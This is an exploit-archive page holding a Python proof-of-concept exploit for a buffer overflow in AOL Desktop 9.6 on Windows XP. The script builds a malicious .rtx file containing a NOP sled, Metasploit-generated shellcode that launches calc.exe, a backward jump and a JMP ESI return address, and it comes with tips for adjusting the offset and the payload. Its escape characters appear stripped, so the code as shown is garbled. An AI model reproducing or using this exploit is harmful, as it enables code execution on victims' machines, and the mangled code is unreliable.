Home / os / win7

AOL Desktop 9.6 Buffer Overflow

Posted on 04 February 2011

#!/usr/bin/python
# Vulnerable app: AOL Desktop 9.6
# Author: sickness
# Download : http://daol.aol.com/software/aoldesktop96/
# Tested : Windows XP Professional SP3 (EN) latest updates
# DATE   : 02/02/2011
# NOTE: If exploit doesn't work turn AOL off (CTRL+ALT+DELETE and turn all AOL processes off) then try again
# DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr
###################################################################
# You might need to change the offset.
# If you want a payload larger than 400 bytes, then you need to increase the negative jump
# Watch out for other bad chars !!
# Current bad chars: x00x0ax0dx20x31x90x3e
###################################################################


# First Header
hd1 = ("x3cx48x54x4dx4cx3ex3cx46x4fx4ex54x20x20x53x49x5a"
"x45x3dx32x20x50x54x53x49x5ax45x3dx31x30x20x46x41"
"x4dx49x4cx59x3dx22x53x41x4ex53x53x45x52x49x46x22"
"x20x46x41x43x45x3dx22x41x72x69x61x6cx22x20x4cx41"
"x4ex47x3dx22x30x22x3ex3cx41x20x48x52x45x46x3dx22"
"x68x74x74x70x3ax2fx2f")

# Second Header
hd2 = ("x22x3ex74x65x73x74x3cx2fx41x3ex3cx55x3ex3cx42x52"
"x3ex0dx0ax3cx2fx55x3ex3cx2fx46x4fx4ex54x3ex3cx2f"
"x48x54x4dx4cx3ex0dx0a")

payload='x90'* 4968    # 5368 until EIP overwrite - 400 bytes from the negative jump.
payload += 'x90'*16    # Some nops

# msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b 'x00x0ax0dx20x31x90x3e' -t c

payload +=("x33xc9x83xe9xcexe8xffxffxffxffxc0x5ex81x76x0e"
"x17x22xfdx6ax83xeexfcxe2xf4xebxcax74x6ax17x22"
"x9dxe3xf2x13x2fx0ex9cx70xcdxe1x45x2ex76x38x03"
"xa9x8fx42x18x95xb7x4cx26xddxccxaaxbbx1ex9cx16"
"x15x0exddxabxd8x2fxfcxadxf5xd2xafx3dx9cx70xed"
"xe1x55x1exfcxbax9cx62x85xefxd7x56xb7x6bxc7x72"
"x76x22x0fxa9xa5x4ax16xf1x1ex56x5exa9xc9xe1x16"
"xf4xccx95x26xe2x51xabxd8x2fxfcxadx2fxc2x88x9e"
"x14x5fx05x51x6ax06x88x88x4fxa9xa5x4ex16xf1x9b"
"xe1x1bx69x76x32x0bx23x2exe1x13xa9xfcxbax9ex66"
"xd9x4ex4cx79x9cx33x4dx73x02x8ax4fx7dxa7xe1x05"
"xc9x7bx37x7dx23x70xefxaex22xfdx6ax47x4axccxe1"
"x78xa5x02xbfxacxd2x48xc8x41x4ax5bxffxaaxbfx02"
"xbfx2bx24x81x60x97xd9x1dx1fx12x99xbax79x65x4d"
"x97x6ax44xddx28x09x76x4ex9ex44x72x5ax98x6a")
payload += 'x90'*(5368-len(payload))
payload += 'xe9x70xfexffxff'   # Jump back 400 bytes
payload += 'x90'*11
payload += 'xC0xCFxC5x20'       # Universal JMP ESI from [aolusershell.dll]
payload += 'x90'*(6000-len(payload))

exploit = hd1+payload+hd2

try:
file=open('exploit.rtx','w')
file.write(exploit)
file.close()
print 'File created, time to PEW PEW!
'
except:
print 'Something went wrong!
'
print 'Check if you have permisions to write in that folder, of if the folder exists!'

 

TOP

Malware :

Exploits :